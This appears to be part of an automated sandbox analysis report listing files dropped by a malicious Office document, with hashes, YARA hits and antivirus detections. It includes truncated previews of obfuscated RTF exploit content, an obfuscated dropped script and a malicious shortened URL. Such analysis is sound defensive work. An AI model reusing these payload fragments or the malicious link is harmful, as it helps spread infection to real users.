                                                                      SHA-512:8DF14178B08AD2EDE670572394244B5224C8B070199A4BD851245B88D4EE3D7324FC7864D180DE85221ADFBBCAACB9EE9D2A77B5931D4E878E27334BF8589D71
                                                                      Malicious:false
                                                                      Preview:{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\sweettastedbananabuttersmoothchcolcatebutterrichcontenttokeepsmoothbutterchocolatebuntogetmesweetgirl________yummybutterchocolatesmoothheret[1].doc

                                                                      Download File
                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      File Type:Rich Text Format data, version 1
                                                                      Category:dropped
                                                                      Size (bytes):83606
                                                                      Entropy (8bit):2.8490697963531684
                                                                      Encrypted:false
                                                                      SSDEEP:384:i0VT+0OFHYCvQNl3latdBig2xN5EaE43WHQQWbFVMHYrtr4bx+dPAkWy:vV+0o4EQNl3lSdBiPxNiaXOQb154bQvJ
                                                                      MD5:3DE898FD68C0A243530E7322DB8086AB
                                                                      SHA1:9995D08B73661BA9CB66961D765C33B4C197FB4D
                                                                      SHA-256:1CBF3C24A8097C1BED770CDC9982F76F3D986B5F66D0877D8DE371F0A5548FB2
                                                                      SHA-512:3EDB2F0F48D0B96E688BC51ACD0605F4291F63FF6B8D4E059931457A33B5FC70BA8AFCE94FC829D486E3D29F00E2CBF7AACAE44B2DCFD1288F7A9FE78092714B
                                                                      Malicious:true
                                                                      Yara Hits:
                                                                      • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\sweettastedbananabuttersmoothchcolcatebutterrichcontenttokeepsmoothbutterchocolatebuntogetmesweetgirl________yummybutterchocolatesmoothheret[1].doc, Author: ditekSHen
                                                                      Antivirus:
                                                                      • Antivirus: Avira, Detection: 100%
                                                                      Preview:{\rtf1..............{\*\shpdata71020718 \%}.{\9958772614_.|;8=;`4[)98$~]*-|/(|);0%]('?0|!,.`?.[71&&?#80~!~[+_(~79(:,?;>^,=]0%=38?!-.+_-5'?%..]|7?&3(&??-*~~8.5#??2.[|53=45_?[=%<=)9_$|~>$0;??.^._<4%9?+*$_)?7:]5|@?!#7.7#4.+2?])',-?!0;-6@<<[?#7^+%.-%',[/8)~`.6>@<:<._*:?<.(9?*.=?:&'-,;<2??7./3?+?@(=&.7#`&`,|0|:%~,.?&:8<!6-3?7@].[3#^$.4]0@.+6?&45??478^>]#?>(-3_.!|$^3*!80&&]`;!.*&./(_,*?>?/~287.7~+?.%$+9&.6>?>4/_>;&%=|?*2%%&.-+^!05,+^)$6.%?/!3-)4)??^5?++~7:.8|?:6%91$@?9~`.7%>`9@#.;<8_&&.6;5^?6+)_[2?55@/~2[??:=??[('?*116()6=&.5?:^%.$7#/)?&.*$==5.<+?9?/?;1.2`!]82;2^^?..?&[0&?_;2)`.?3..>|.?&>#2.$)8`56<93?<_?+5)9.,#710/;%89?'0<'88~<).`3;:7=:7~!$);:0[..6+2=(![??'22.978@;)*8&?7?='19#6?+[.42010&3$0^3%$.'7|)3!#>3/*95[<)0<.]?4.-??.9`.~..?&~.$2%:|8:5!;!95'--_*2]'?.6?9%(>$-:!;-?+*.?.?%.%:1'.]#,`?+*?$?3-27^`6=7.]%?._5?>2>2`1?&!?].>_]7!+.)*-+=?%9.=]=./6_..;..~?*..$=?,)[>?)%!??*8?^%95=>+())51?>%?1^76^?!@-3./~&>;7*>5?'?21[.<^0^`*~#<>?`5<=<9$!1<^?@&/``^.'49)'!;</<</1~%/%6<'?.?)[$64,%^=&)&(-$=,.?76$9%7%*3'?#/

                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\sweetbuttersmoothbananahereforyou[1].tiff

                                                                      Download File
                                                                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):183474
                                                                      Entropy (8bit):3.8646231642419524
                                                                      Encrypted:false
                                                                      SSDEEP:1536:WJNuBK2J+KxCPpyHa6XgeeLgt5pzeyGw9HkJm4Ortmf3J2GtLRENhc8kVNYYN3I2:oEK2VsAggt5phGw9SCLEVwixi79UeUf
                                                                      MD5:A285D18480C6F6CC2D261CDE7354D19D
                                                                      SHA1:D44C64C965E46B6AB12BD418F07E671A50E74CA2
                                                                      SHA-256:6FE6D465B7B4E666A8B8AF9B0CE9BB28B731E097384F26C2E2C1376FB21F904A
                                                                      SHA-512:42BCDDFF6189953F0412D967E22DC8ACADAF1C64FB9D9FC868BCB21F097AC13ADB0C6FC6100375B6C94FD8F0022B63300F9A3BD029602D29E493DFD13C23F1C6
                                                                      Malicious:false
                                                                      Preview:......d.L.I.c.i.c.J.f.h.G. .=. .".q.z.L.W.G.G.W.S.L.L.".....c.m.p.L.L.A.f.P.G.s. .=. .".p.C.e.L.T.J.G.R.n.B.".....n.l.f.K.h.k.T.W.K.T. .=. .".z.C.L.m.P.J.A.o.m.x.".....A.N.C.j.G.q.j.i.W.W. .=. .".h.x.W.c.W.m.K.k.m.z.".....L.W.U.L.W.N.i.a.A.l. .=. .".K.z.i.U.L.i.g.r.k.z.".....k.A.e.k.G.m.b.k.B.f. .=. .".A.L.Z.z.n.A.W.O.B.d.".....b.h.d.f.A.H.m.g.p.L. .=. .".U.u.u.K.W.z.i.i.o.C.".........B.C.H.L.N.P.t.z.Z.L. .=. .".e.d.K.N.A.z.i.K.A.C.".....U.z.Z.G.L.G.p.o.U.f. .=. .".l.q.b.m.e.l.s.q.a.G.".....A.c.N.f.q.o.k.j.b.d. .=. .".W.o.U.U.W.K.I.W.K.K.".....k.z.L.v.i.k.u.W.G.j. .=. .".i.L.i.c.C.u.K.Z.T.Q.".....G.m.J.e.N.W.q.A.a.U. .=. .".C.z.G.L.f.o.c.G.W.L.".....K.m.L.e.s.N.o.z.U.v. .=. .".W.h.e.N.s.q.U.Z.i.c.".....S.m.N.z.k.q.L.v.H.G. .=. .".T.p.m.j.k.A.g.W.U.L.".....N.m.m.z.A.R.l.K.i.a. .=. .".N.Z.P.e.R.H.c.d.l.c.".....g.L.m.n.K.G.K.s.N.K. .=. .".a.h.q.O.n.A.n.a.u.q.".....i.r.O.l.L.N.z.W.e.P. .=. .".s.G.b.i.o.L.L.t.W.z.".........L.U.Q.K.k.T.K.U.L.o. .=. .".o.Z.L.n.i.U.Q.L.O.H.".....B.c.c.W.d.n.e.

                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1C525119.emf

                                                                      Download File
                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                      Category:dropped
                                                                      Size (bytes):4527404
                                                                      Entropy (8bit):3.8573411297737294
                                                                      Encrypted:false
                                                                      SSDEEP:24576:OYNVUoJCoJeoJfoJuZLqAjBfBf6Fm+qw8W5/qIjB/Rfy5m+qw4/:OYNuoJCoJeoJfoJD
                                                                      MD5:8A188A6917AD1FA0C7F1AA20A63C8593
                                                                      SHA1:4D2270D647D4A3680B47E85501C7AB1442DDCBB2
                                                                      SHA-256:728A3D9B1BEE7CD8BAA90AA0B1A4805A93238C8F835EA685931AC676BA7EF3E3
                                                                      SHA-512:823246CAC3D8A45980CE0623C485FB0B74CE7AA68CCA37B22FEF1924685F1201298163C398688057736EC4551999B5455DB1C97ABC7DA97E5A07589CD4FD7CDF
                                                                      Malicious:false
                                                                      Preview:....l...............X................5.. EMF....,.E.........................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................L...d...............N........... ...O...!..............?...........?................................'................ `.....%...........(.................... `.L...d...............N...........~...

                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FFA95D3F.doc

                                                                      Download File
                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                      File Type:Rich Text Format data, version 1
                                                                      Category:dropped
                                                                      Size (bytes):83606
                                                                      Entropy (8bit):2.8490697963531684
                                                                      Encrypted:false
                                                                      SSDEEP:384:i0VT+0OFHYCvQNl3latdBig2xN5EaE43WHQQWbFVMHYrtr4bx+dPAkWy:vV+0o4EQNl3lSdBiPxNiaXOQb154bQvJ
                                                                      MD5:3DE898FD68C0A243530E7322DB8086AB
                                                                      SHA1:9995D08B73661BA9CB66961D765C33B4C197FB4D
                                                                      SHA-256:1CBF3C24A8097C1BED770CDC9982F76F3D986B5F66D0877D8DE371F0A5548FB2
                                                                      SHA-512:3EDB2F0F48D0B96E688BC51ACD0605F4291F63FF6B8D4E059931457A33B5FC70BA8AFCE94FC829D486E3D29F00E2CBF7AACAE44B2DCFD1288F7A9FE78092714B
                                                                      Malicious:true
                                                                      Yara Hits:
                                                                      • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FFA95D3F.doc, Author: ditekSHen
                                                                      Antivirus:
                                                                      • Antivirus: Avira, Detection: 100%
                                                                      Preview:{\rtf1..............{\*\shpdata71020718 \%}.{\9958772614_.|;8=;`4[)98$~]*-|/(|);0%]('?0|!,.`?.[71&&?#80~!~[+_(~79(:,?;>^,=]0%=38?!-.+_-5'?%..]|7?&3(&??-*~~8.5#??2.[|53=45_?[=%<=)9_$|~>$0;??.^._<4%9?+*$_)?7:]5|@?!#7.7#4.+2?])',-?!0;-6@<<[?#7^+%.-%',[/8)~`.6>@<:<._*:?<.(9?*.=?:&'-,;<2??7./3?+?@(=&.7#`&`,|0|:%~,.?&:8<!6-3?7@].[3#^$.4]0@.+6?&45??478^>]#?>(-3_.!|$^3*!80&&]`;!.*&./(_,*?>?/~287.7~+?.%$+9&.6>?>4/_>;&%=|?*2%%&.-+^!05,+^)$6.%?/!3-)4)??^5?++~7:.8|?:6%91$@?9~`.7%>`9@#.;<8_&&.6;5^?6+)_[2?55@/~2[??:=??[('?*116()6=&.5?:^%.$7#/)?&.*$==5.<+?9?/?;1.2`!]82;2^^?..?&[0&?_;2)`.?3..>|.?&>#2.$)8`56<93?<_?+5)9.,#710/;%89?'0<'88~<).`3;:7=:7~!$);:0[..6+2=(![??'22.978@;)*8&?7?='19#6?+[.42010&3$0^3%$.'7|)3!#>3/*95[<)0<.]?4.-??.9`.~..?&~.$2%:|8:5!;!95'--_*2]'?.6?9%(>$-:!;-?+*.?.?%.%:1'.]#,`?+*?$?3-27^`6=7.]%?._5?>2>2`1?&!?].>_]7!+.)*-+=?%9.=]=./6_..;..~?*..$=?,)[>?)%!??*8?^%95=>+())51?>%?1^76^?!@-3./~&>;7*>5?'?21[.<^0^`*~#<>?`5<=<9$!1<^?@&/``^.'49)'!;</<</1~%/%6<'?.?)[$64,%^=&)&(-$=,.?76$9%7%*3'?#/

                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{03652721-936B-412E-9DA4-9599756B16B0}.tmp

                                                                      Download File
                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                      Category:dropped
                                                                      Size (bytes):16384
                                                                      Entropy (8bit):2.7551445675917683
                                                                      Encrypted:false
                                                                      SSDEEP:96:b2MPkt/XgVoPApC4/CMPnQlXgVoPApC4/:TPktYYGdPnQWYG
                                                                      MD5:AF348EB87C2C2C53EEFDB4906A16C410
                                                                      SHA1:89944DEB511391BDC14224F54970CD5F782368EB
                                                                      SHA-256:31A458DC7D4299B43F2692358A26A7BAFBB15ED0430356AFCAF5A0894D615312
                                                                      SHA-512:98E1CBA181989306BF811CAA1A1F21D2C12D4F5334BC5DE4A09FC9E1A0D98D56D65982B1F389D193012F91CBECAB389A28A5971948AF1FD6448A6074A25F77C0
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: Avira, Detection: 100%
                                                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{1D71363B-E661-4678-9D40-E2262C37EB75}.tmp

                                                                      Download File
                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):1024
                                                                      Entropy (8bit):0.05390218305374581
                                                                      Encrypted:false
                                                                      SSDEEP:3:ol3lYdn:4Wn
                                                                      MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                      SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                      SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                      SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                      Malicious:false
                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{A944087E-6FB7-4C82-86AD-B539569F0482}.tmp

                                                                      Download File
                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):16384
                                                                      Entropy (8bit):3.6046860965124106
                                                                      Encrypted:false
                                                                      SSDEEP:384:rmoRJLOnSlykANrg99+raLDdxJBbCK/St64HG+pNt:BRISKKPKaLDz/b/as4HGGNt
                                                                      MD5:0EE116C979EAB0FD3A831E5753DDFC66
                                                                      SHA1:CD7364AB09A1375751E7A33B7545216A2D04EB20
                                                                      SHA-256:ADAF0E143231D9990114FCA3B41291222E053CA83F876A2FBE99FDBA97A774B4
                                                                      SHA-512:FAB22C14C4B74BED90E8E77AC2409C4908D34FF9E3A86EDB5FFD295F86AB7B95262A2F14DB33823FE5631EA7875D9CB8D690F12BA00818433B4BB3F802A367B4
                                                                      Malicious:false
                                                                      Preview:....................9.5.8.7.7.2.6.1.4._...|.;.8.=.;.`.4.[.).9.8.$.~.].*.-.|./.(.|.).;.0.%.].(.'.?.0.|.!.,...`.?...[.7.1.&.&.?.#.8.0.~.!.~.[.+._.(.~.7.9.(.:.,.?.;.>.^.,.=.].0.%.=.3.8.?.!.-...+._.-.5.'.?.%.....].|.7.?.&.3.(.&.?.?.-.*.~.~.8...5.#.?.?.2...[.|.5.3.=.4.5._.?.[.=.%.<.=.).9._.$.|.~.>.$.0.;.?.?...^..._.<.4.%.9.?.+.*.$._.).?.7.:.].5.|.@.?.!.#.7...7.#.4...+.2.?.].).'.,.-.?.!.0.;.-.6.@.<.<.[.?.#.7.^.+.%...-.%.'.,.[./.8.).~.`...6.>.@.<.:.<..._.*.:.?.<...(.9.?.*...=.?.:.&.'.-.,.;.<.2.?.?.7.../.3.?.+.?.@.(.=.&...7.#.`.&.`.,.|.0.|.:.%.~.,...?.&.:.8.<.!.6.-.3.?.7.@.]...[.3.#.^.$...4.].0.@...+.6.?.&.4.5.?.?.4.7.8.^.>.].#.?.>.(.-.3._...!.|.$.^.3.*.!.8.0.&.&.].`.;.!...*.&.../.(._.,.*.?.>.?./.~.2.8.7...7.~.+.?...%.$.+.9.&...6.>.?.>.4./._.>.;.&.%.=.|.?.*.2.%.%.&...-.+.^.!.0.5.,.+.^.).$.6...%.?./.!.3.-.).4.).?.?.^.5.?.+.+.~.7.:...8.|.?.:.6.%.9.1.$.@.?.9.~.`...7.%.>.`.9.@.#...;.<.8._.&.&...6.;.5.^.?.6.+.)._.[.2.?.5.5.@./.~.2.[.?.?.:.=.?.?.[.(.'.?.*.1.1.6.(.).6.=.&...5.?.:.^.%...$.7.#./.).?.&.

                                                                      C:\Users\user\AppData\Local\Temp\0fpiukpm.m5p.ps1

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:very short file (no magic)
                                                                      Category:dropped
                                                                      Size (bytes):1
                                                                      Entropy (8bit):0.0
                                                                      Encrypted:false
                                                                      SSDEEP:3:U:U
                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                      Malicious:false
                                                                      Preview:1

                                                                      C:\Users\user\AppData\Local\Temp\bclyvrd4.kd4.psm1

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:very short file (no magic)
                                                                      Category:dropped
                                                                      Size (bytes):1
                                                                      Entropy (8bit):0.0
                                                                      Encrypted:false
                                                                      SSDEEP:3:U:U
                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                      Malicious:false
                                                                      Preview:1

                                                                      C:\Users\user\AppData\Local\Temp\bhv2AF7.tmp

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                      File Type:Extensible storage engine DataBase, version 0x620, checksum 0x05bf0a1f, page size 32768, DirtyShutdown, Windows version 6.1
                                                                      Category:dropped
                                                                      Size (bytes):21037056
                                                                      Entropy (8bit):1.138861601008914
                                                                      Encrypted:false
                                                                      SSDEEP:24576:9O1U91o2I+0mZ5lChHLcGaHqqnEXwPtofJIRH330nW/jMB1emX4UJlNd:9OEXs1LuHqqEXwPW+RHA6m1fN
                                                                      MD5:CB4D369D51CCAC78DD3B05C9A5754A27
                                                                      SHA1:8A81BA817B60EFF6E903FE58A68F3E8D9C30876D
                                                                      SHA-256:3E1B39227C237F93FE0CE1C9C5E868AB62780945689F93EF6F22396D63774933
                                                                      SHA-512:64AC39C37F9F4A47EF416DCB489F8BF43E044415EB91D6EE389C14527F9D9878B5C52F8311C9A8035FA6CA57DF4DE8AA143000348CAFF03E05FB787213A80179
                                                                      Malicious:false
                                                                      Preview:....... ........................u..............................;:...{..05...|.......................................u..............................................................................................+............................................................................................................................... .......4....{......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\cg0foebx.oe3.psm1

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:very short file (no magic)
                                                                      Category:dropped
                                                                      Size (bytes):1
                                                                      Entropy (8bit):0.0
                                                                      Encrypted:false
                                                                      SSDEEP:3:U:U
                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                      Malicious:false
                                                                      Preview:1

                                                                      C:\Users\user\AppData\Local\Temp\dkvezxrxwrjunntcnioxumzdjxq

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                      File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):2
                                                                      Entropy (8bit):1.0
                                                                      Encrypted:false
                                                                      SSDEEP:3:Qn:Qn
                                                                      MD5:F3B25701FE362EC84616A93A45CE9998
                                                                      SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                      SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                      SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                      Malicious:false
                                                                      Preview:..

                                                                      C:\Users\user\AppData\Local\Temp\ru3ofdm4.k0x.ps1

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:very short file (no magic)
                                                                      Category:dropped
                                                                      Size (bytes):1
                                                                      Entropy (8bit):0.0
                                                                      Encrypted:false
                                                                      SSDEEP:3:U:U
                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                      Malicious:false
                                                                      Preview:1

                                                                      C:\Users\user\AppData\Local\Temp\{1C4D8CF2-EB92-49C1-A96B-F05FA6669980}

                                                                      Download File
                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):131072
                                                                      Entropy (8bit):0.025630255835805735
                                                                      Encrypted:false
                                                                      SSDEEP:6:I3DPcfCo7FvxggLR3jqEqtCJkDRXv//4tfnRujlw//+GtluJ/eRuj:I3DPNod3quJsvYg3J/
                                                                      MD5:BBD11F270D6870E9F44AF512EC81005C
                                                                      SHA1:3EB001FCCB24E107F8F8B9CC58B34DA2ADAE9F78
                                                                      SHA-256:C88651DCB44162513A04F47447CD3A7A1BD8B950ECC10CC8602F96251E0DD9F5
                                                                      SHA-512:9BD49FF4B67B5B6E3209304788B5B582EFEA4793A6563609004855D2411D2DD54ABC910B08C5AFD8DC84A39ADEBE4380780FE13E1537E33C8DF1311168B86430
                                                                      Malicious:false
                                                                      Preview:......M.eFy...zX...S..O...l.".;S,...X.F...Fa.q............................'...&lDD..|...(...........eS..E....}........................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\{E5CFDE41-EA4C-456B-9AF1-BC7141C0579E}

                                                                      Download File
                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):131072
                                                                      Entropy (8bit):0.025519321670128242
                                                                      Encrypted:false
                                                                      SSDEEP:6:I3DPcUGavxggLRf/tFdlpRXv//4tfnRujlw//+GtluJ/eRuj:I3DPTblpHvYg3J/
                                                                      MD5:8CCD4C4F7E6CED4EB453CA65B0DFE7FE
                                                                      SHA1:388C5890D19F706C413467CB2EA87438BF92F7DD
                                                                      SHA-256:9E9E4E3EFC3D5CD40A0409E18D75EEFB0D75CA62AB35A0A64EA60B03E931BB35
                                                                      SHA-512:E79E62EC75E0F0EC4E02A8570629CEABB88783240211F8EF228737F991A825333F60A201DEDA3D35870E1DD3949332405E98F711A3FDB8820E17406C036BE482
                                                                      Malicious:false
                                                                      Preview:......M.eFy...zu-.Q.zB....\.S,...X.F...Fa.q............................i.....|G.T.....}..............5I.LO:.u.......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\~DFAEDAA30879C445E4.TMP

                                                                      Download File
                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):16384
                                                                      Entropy (8bit):0.9688214574054784
                                                                      Encrypted:false
                                                                      SSDEEP:48:7ilGMlVIH4DVL1Qn4N9CUGyU0EkvMWG/uD5k10a/l:7ilX3CY9J9hUDWGGK1/l
                                                                      MD5:31D7B488C9DC7B95A6A1C09138CEB014
                                                                      SHA1:EA28B9372390AE6DEBD8E340314B0DDC0028C5DD
                                                                      SHA-256:F8B54E56B1520495A4BC974143CFA74759EE64A544F26B26A2CF7A91AC5E61FD
                                                                      SHA-512:1A282FD71CFE192199DB96F473C3724AD5C16E7F2C1813788D8ABA02F58A52557E03C817AEE6762DE0E9A882C6211FBCCE966B5094120C6AB3DBF513B37033D0
                                                                      Malicious:false
                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\~DFB02B3B8887942EDE.TMP

                                                                      Download File
                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):512
                                                                      Entropy (8bit):0.0
                                                                      Encrypted:false
                                                                      SSDEEP:3::
                                                                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                      Malicious:false
                                                                      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\FoNVg0.url

                                                                      Download File
                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                      File Type:MS Windows 95 Internet shortcut text (URL=<https://zhort.de/FoNVg0>), ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):49
                                                                      Entropy (8bit):4.606017559110707
                                                                      Encrypted:false
                                                                      SSDEEP:3:HRAbABGQYm2fz4wjv:HRYFVm4Uq
                                                                      MD5:0ED70B648343E7CB1BC56F6BBED23E4F
                                                                      SHA1:769AB5A7D8C41F36B4B9E1EF8EDD7BB416043F60
                                                                      SHA-256:8BD23CFEB4C176ED0B49197500EAD3BAE6C130044CF33B778ADE36B3F7A2634A
                                                                      SHA-512:E97B0AF07DE2A3B25372584BA0DDD955EB64FF31BD39AD348D8DC62D9D9CD2EC628F96890E1AD055732272859CDDB423537F816ED19FEC86E9F7C1C394BA58E7
                                                                      Malicious:true
                                                                      Preview:[InternetShortcut]..URL=https://zhort.de/FoNVg0..

                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

                                                                      Download File
                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):41
                                                                      Entropy (8bit):4.271470906740503
                                                                      Encrypted:false
                                                                      SSDEEP:3:bDJhCWpt2kZ1:b7CUxb
                                                                      MD5:2D4963B253DDF772BF52B60FC3B8842F
                                                                      SHA1:846A135842F0884160B0A8D049153D954A9A9264
                                                                      SHA-256:19F6856EB942E69A9D0CE3036A8340D2D2279F03F270B87C5D3FD5D5D5A3C46A
                                                                      SHA-512:8C0A1F42DE8CF52AFF157664DA1DFB43C8CD5AC38912CEE750E11BA751329A679695A49126A871DA9BC066A706547645EFFD4BD7ECECE4E3B8A52F49746D4DB2
                                                                      Malicious:false
                                                                      Preview:[folders]..FoNVg0.url=0..zhort.de.url=0..

                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\zhort.de.url

                                                                      Download File
                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
